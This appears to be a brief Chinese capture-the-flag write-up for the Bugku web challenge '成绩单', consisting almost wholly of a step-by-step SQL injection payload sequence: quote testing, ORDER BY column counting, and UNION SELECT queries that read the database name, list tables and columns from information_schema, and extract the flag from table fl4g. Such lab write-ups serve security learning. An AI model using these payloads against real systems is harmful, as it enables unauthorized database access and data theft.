bugku-web-成绩单

非常简单的sql注入

1
1'
1'#
id=1' order by 1#
id=1' order by 2#
id=1' order by 3#
id=1' order by 4#
id=1' order by 5#
id=' union select 1,2,3,4#
id=' union select 1,2,3,database()#
id=' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
id=' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#
id=' union select 1,2,3,skctf_flag from fl4g#

你可能感兴趣的:(bugku-web-成绩单)